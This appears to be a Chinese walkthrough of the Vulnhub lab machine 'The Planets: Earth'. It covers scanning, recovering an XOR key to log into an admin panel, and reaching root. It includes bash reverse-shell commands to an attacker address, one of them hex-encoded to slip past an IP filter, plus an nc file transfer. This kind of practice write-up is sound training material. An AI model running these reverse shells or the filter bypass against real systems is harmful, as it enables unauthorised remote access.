0x01信息收集

1.1、nmap扫描

IP段扫描,确定靶机地址

平扫描

nmap 192.168.1.0/24

扫描结果(部分)

Nmap scan report for earth.local (192.168.1.129)

Host is up (0.0015s latency).

Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)

PORT    STATE SERVICE

22/tcp  open  ssh

80/tcp  open  http

443/tcp open  https

MAC Address: 00:0C:29:61:E4:BE (VMware)

或者全端口全脚本ip段扫描(慢)

nmap -A -p- -v 192.168.1.0/24

扫描结果

TRACEROUTE

HOP RTT     ADDRESS

1   2.57 ms 192.168.1.2

Nmap scan report for earth.local (192.168.1.129)

Host is up (0.0015s latency).

Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (admin-prohibited)

PORT    STATE SERVICE  VERSION

22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)

| ssh-hostkey:

|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)

|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)

80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)

| http-methods:

|_  Supported Methods: GET HEAD OPTIONS

|_http-title: Earth Secure Messaging

|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)

|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

|_ssl-date: TLS randomness does not represent time

| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space

| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local

| Issuer: commonName=earth.local/stateOrProvinceName=Space

| Public Key type: rsa

| Public Key bits: 4096

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2021-10-12T23:26:31

| Not valid after:  2031-10-10T23:26:31

| MD5:   4efa:65d2:1a9e:0718:4b54:41da:3712:f187

|_SHA-1: 04db:5b29:a33f:8076:f16b:8a1b:581d:6988:db25:7651

| tls-alpn:

|_  http/1.1

|_http-title: Earth Secure Messaging

| http-methods:

|_  Supported Methods: GET HEAD OPTIONS

MAC Address: 00:0C:29:61:E4:BE (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|storage-misc

Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28

Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)

No exact OS matches for host (test conditions non-ideal).

Uptime guess: 19.199 days (since Tue Sep 17 23:32:55 2024)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=257 (Good luck!)

IP ID Sequence Generation: All zeros

得到信息

IP:192.168.1.129

开放端口:22 ssh 80 http 443  ssl

及其服务版本号
1.1.1服务查看

22端口——ssh服务

80端口——http(尝试ip访问界面)

访问没有结果

443端口——ssl(尝试重新访问)

ip访问是Fedora Webserver Test Page页面,尝试使用域名访问

发现443端口有DNS解析 DNS:earth.local, DNS:terratest.earth.local,在hosts文件中添加DNS解析

192.168.1.129	earth.local

192.168.1.129	terratest.earth.local

1.2、网页信息收集

添加完成访问页面

http://earth.local/

发现Previous Messages:

0d4252435841450f50435d45191349424213180d4252435841451e0f

0d4252435841450f50435d45191349424213180d4252435841451e0f

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

继续访问

https://terratest.earth.local/

在扫描中我们发现有ssl服务在这里其实我们两个网址都可以用https

1.3、目录扫描

earth.local目录扫描:

dirb https://earth.local/

结果:

┌──(root㉿kali)-[/etc]

└─# dirb https://earth.local/

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Mon Oct  7 04:36:07 2024

URL_BASE: https://earth.local/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://earth.local/ ----

+ https://earth.local/admin (CODE:301|SIZE:0)

+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)

-----------------

END_TIME: Mon Oct  7 04:36:34 2024

DOWNLOADED: 4612 - FOUND: 2

发现可疑目录:admin

terratest.earth.local目录扫描

dirb https://terratest.earth.local/

结果:

┌──(root㉿kali)-[/etc]

└─# dirb https://terratest.earth.local/

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Mon Oct  7 04:38:50 2024

URL_BASE: https://terratest.earth.local/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://terratest.earth.local/ ----

+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)

+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

-----------------

END_TIME: Mon Oct  7 04:39:01 2024

DOWNLOADED: 4612 - FOUND: 3

发现可疑文件:robots.txt

1.3.1、访问目录

分别对admin、robots.txt进行访问

admin:

发现登录界面

robots.txt

发现文件Disallow: /testingnotes.*但不知道格式,进行爆破得到为txt格式

测试安全消息系统注意事项:

*使用XOR加密作为算法,在RSA中使用应该是安全的。

*地球已确认他们已收到我们发送的信息。

*testdata.txt 用于测试加密。

*terra 用作管理门户的用户名。

去做:

*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?

*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?

*需要改进消息界面和管理面板的界面,目前非常基础。

告诉我们加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:

0x02漏洞攻击

1.1、XOR解密

写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

脚本():

import binascii

data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"

data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"

data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

d1 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

d2 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

d3 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1, 16) ^ int(d1, 16)))

print(hex(int(data2, 16) ^ int(d2, 16)))

print(hex(int(data3, 16) ^ int(d3, 16)))

得到结果

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

分别对其进行十六进制转文本解码:

得第三个解密:

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

根据前面猜测密码是:earthclimatechangebad4humans

1.2、登录后台

用户名:terra

密 码:earthclimatechangebad4humans

1.3、命令执行

看起来像是个命令执行接口,让我们小心使用

反弹一个shell看看

bash -c 'exec bash -i &>/dev/tcp/192.168.1.128/6666 <&1'

发现没有用,翻一下有啥吧

查找 flag相关文件

find / -name "*flag*"

发现第一个flag

Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

继续翻

看看ls /var/www/html/terratest.earth.local有啥没有可用的

最后在/var/earth_web/secure_message/forms.py发现了服务器段采用了正则对IP进行数字匹配

1.4、shell反弹

把ip地址转换为16进制试试反弹

bash -c 'exec bash -i &>/dev/tcp/0xc0.0xa8.0x01.0x80/6666 <&1'

发现反弹成功

1.5、提权

查找可用权限

发现一个reset_root 运行一下

发现用不了

把文件导出来看看

nc -nlvp 7777 >reset_root

nc 192.168.1.129 7777 < /usr/bin/reset_root

使用 strace 命令进行调试

发现没有权限,给权调试一下看看

strace ./reset_root

发现缺失了三个文件,在靶机里面也没有

write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...

) = 38

access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)

write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

) = 44

exit_group(0)                           = ?

+++ exited with 0 +++

在靶机里面创建三个文件之后运行reset_root

提权成功

查找flag

拿到flag

Vulnhub 靶机 THE PLANETS: EARTH的更多相关文章

  1. vulnhub靶场之THE PLANETS: EARTH

    准备: 攻击机:虚拟机kali.本机win10. 靶机:THE PLANETS: EARTH,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnh ...

  2. vulnhub靶机Os-hackNos-1

    vulnhub靶机Os-hackNos-1 信息搜集 nmap -sP 192.168.114.0/24 找到开放机器192.168.114.140这台机器,再对这台靶机进行端口扫描. 这里对他的端口 ...

  3. vulnhub靶机-Me and My Girlfriend: 1

    vulnhub靶机实战 1.靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.先看描述(要求) 通过这个我们可以知道我们 ...

  4. Vulnhub 靶机 CONTAINME: 1

    Vulnhub 靶机 CONTAINME: 1 前期准备: 靶机地址:https://www.vulnhub.com/entry/containme-1,729/ kali地址:192.168.147 ...

  5. Vulnhub - THE PLANETS: EARTH

    环境配置 从www.vulnhub.com下载靶机,在VMware中导入,自动分配IP 主机发现 通过对内网主机的扫描,VMware为目标主机 端口扫描 使用nmap对主机进行扫描 发现443端口信息 ...

  6. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

  7. 对vulnhub靶机lampiao的getshell到脏牛提权获取flag

    前言: vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权. 靶机下载地址:https://mega.nz/#!aG4AAaDB!CBL ...

  8. PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT

    猫宁~~~ 地址:https://www.vulnhub.com/entry/sunset-twilight,512/ 关注工具和思路. nmap 192.168.43.0/24靶机IP192.168 ...

  9. vulnhub靶机练习-Os-Hax,详细使用

    Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege ...

  10. vulnhub靶机练习-Os-hackNos-1,超详细使用

    第一次写自己总结的文章,之后也会有更新,目前还在初学阶段. 首先介绍一下靶机,靶机是 vulnhub Os-hackNos-1 简介: 难度容易到中, flag 两个 一个是普通用户的user.txt ...

随机推荐

  1. 【牛客刷题】HJ6 质数因子

    题目链接 这道题本身更多的是考察如何计算一个数的质数因子,更像是一道数学题,用到了循环的方法: package main import ( "fmt" "math&quo ...

  2. div构建table

    1.Css display值与解释-(详细可见CSS手册的CSS display手册)参数:block :块对象的默认值.用该值为对象之后添加新行none :隐藏对象.与visibility属性的hi ...

  3. 2. 基于MCU应用的EMC指南

    1. 硬件 主要的噪声感受器和发生器是印刷电路板(PCB)上的轨道和布线,特别是MCU附近的轨道和布线.因此,防止噪声问题的第一步行动涉及到PCB布局和电源设计.一般来说,MCU周围的元器件数量越少, ...

  4. 使用python-slim镜像遇到无法使用PostgreSQL的问题

    前言 之前不是把 DjangoStarter 的 docker 方案重新搞好了吗 一开始demo部署是使用 SQLite 数据库的,用着没问题,但很快切换到 PostgreSQL 的时候就遇到问题了- ...

  5. 处理一直显示npm WARN using –force Recommended protections disabled.的问题

    使用 npm config set force false 可以消除.

  6. zabbix基本概念

    Zabbix是一个企业级的.开源的.分布式监控解决方案. Zabbix可以监控网络和服务的监控状况. Zabbix利用灵活的告警机制,允许用户对事件发送基于Email的告警. 这样可以保证快速的对问题 ...

  7. 搭建QT开发环境

    下载 Qt官网,Qt下载网址 安装前要登录账号,其他的该咋就咋样,路径不能有中文. 组件自己选 我的是MinGW.Android.虚拟键盘.Qt脚本.Qt Creator 然后创个项目,能跑起来就是安 ...

  8. esphome-esp8266

    esp8266使用esphome接入hass 对于生成配置文件的更改 此处nodemcu泛指集成的开发板,一般十几块钱一块 下方使用的是D1,对应的针脚是GPIO5 esp8266: board: n ...

  9. druid数据库连接池在使用中遇到的一些问题和说明

    get connection timeout retry : 1 2024-02-06 11:18:26.364 ERROR 23752 --- [eate-1838225797] com.aliba ...

  10. golang协程的最佳实践与context包的基本使用

    1.协程最佳实践,多个协程并发求素数 点击查看代码 var wg sync.WaitGroup func Prime(num int) bool { if num == 1 { return fals ...